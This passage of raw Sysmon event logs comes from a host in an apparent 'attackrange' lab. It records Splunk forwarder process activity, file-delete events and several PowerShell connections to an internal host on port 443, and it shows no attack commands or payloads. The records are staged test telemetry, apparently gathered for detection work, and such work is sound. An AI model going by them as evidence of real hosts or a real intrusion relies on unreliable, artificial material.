Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.981{B81B27B7-7469-613B-67B4-03000000C801}4660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:19.450{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BD45E8AD8AE311DD95E8BE8D44847CDF,SHA256=3441DA3CA0EDF0E1EFD875525F3797B0081047EFDCE13ADBB106F7CF755CFDA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:19.019{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4285EA70E3E382014B2F4E0C996FC410,SHA256=90B9540D476B5073C9BC9E60865A095202C8EA00FDA5C0F0209C288AD3496F8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:45.423{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52588-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:20.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EA96759538EF6B8A3547B18989596B5,SHA256=D24C63E758E59A35C3F3D0AE6EB31106C2A19510751601C67A3D29DA046D7348,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:21.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E6DD55AC6E7FE5780257F857156B6D2,SHA256=FA612F657D2400B5E1A8DCBEF606296BD54CE73E4AB437C2868E00B9CE758BEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:22.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EF9876894513A3158A5AFB637655467,SHA256=AB72C1B26DD575E0C5634386BBEF534502E772C96585E99D2C677F6C152C402B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:23.201{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:23.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F0FA660BB26B3C476AB6CB5F821A294,SHA256=1BCEF3E7229A546110EAA1D0B5EF16309A7C26B264E6A860AF5CA3182C05CCCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:24.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1EFEA490BE5267E07A0C3F42F86A4CFE,SHA256=77F149A2D81E0389D128A64DE83A893E7ED8A8AD20B12E801EF5F65C2CC5E2EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:49.056{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52589-false10.0.1.12-8000- 23542300x800000000000000035343749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:24.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A3855B36252E79E3B47496F9077CE6,SHA256=51522AEB1812623EBF7A1696F5E72613A904602E58DD7C8D997D76CA08F5FD51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:50.425{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52591-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:50.187{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52590-false10.0.1.12-8089- 23542300x800000000000000035343752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:25.133{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8249D79E83C40A557B69D0FBB866CEC6,SHA256=056254BA10BEA2311938B984E20F12F341005FFCA746080F73CEAA4575CD029B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:26.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49CEED4D3182E7A85808386A8F0B154A,SHA256=41297F47130FEC60D40D838BA94AF0D258862AB6A4BC7BAC04510D0D5EBA8ED6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:27.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B365390B091DA81178A882879AF643D3,SHA256=D285A01B7184C152ED217904448280D66F9D16C0A3B9BD200532B5FE8530BDDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:28.217{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7181B8394CBE1C36878C3FFCD5B872DD,SHA256=DCFFC5C445D26D06A20D1720B50C1EB649CA620529938659C7C6B1598C6C7B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:54.139{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52592-false10.0.1.12-8000- 23542300x800000000000000035343758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:29.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DBCF3B342ED0A5BCB62F883C11FFB4B,SHA256=253C4D1D94151ADAADD0E871CD9DAD58F612F7A6D5C1B054D0925F82F98B2EB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:30.500{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FA15371D8A822C941D29A086FD192123,SHA256=5F7B77FEA3252A4487CD8374E6E1BBF1D13FF6CECAC12304DC960F80EC0D269A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:30.263{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D861E1C527B14AB251D3F5DD77A353,SHA256=CBEE0E80236A2AA16765970C07B581E46EF864646E85BE5B906CB7B64C121C95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.976{B81B27B7-7477-613B-69B4-03000000C801}56926736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7477-613B-69B4-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7477-613B-69B4-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.798{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7477-613B-69B4-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.793{B81B27B7-7477-613B-69B4-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035343772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:56.438{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52593-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035343771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.346{B81B27B7-7477-613B-68B4-03000000C801}6125632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ED9A60C4BD05DF5DF17F60AD6D61968,SHA256=2911AFCF8F0DB6E15B31BCA90585869C32F85F99D96B3E69404381FD73F5DB5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7477-613B-68B4-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7477-613B-68B4-03000000C801}612C:\Program 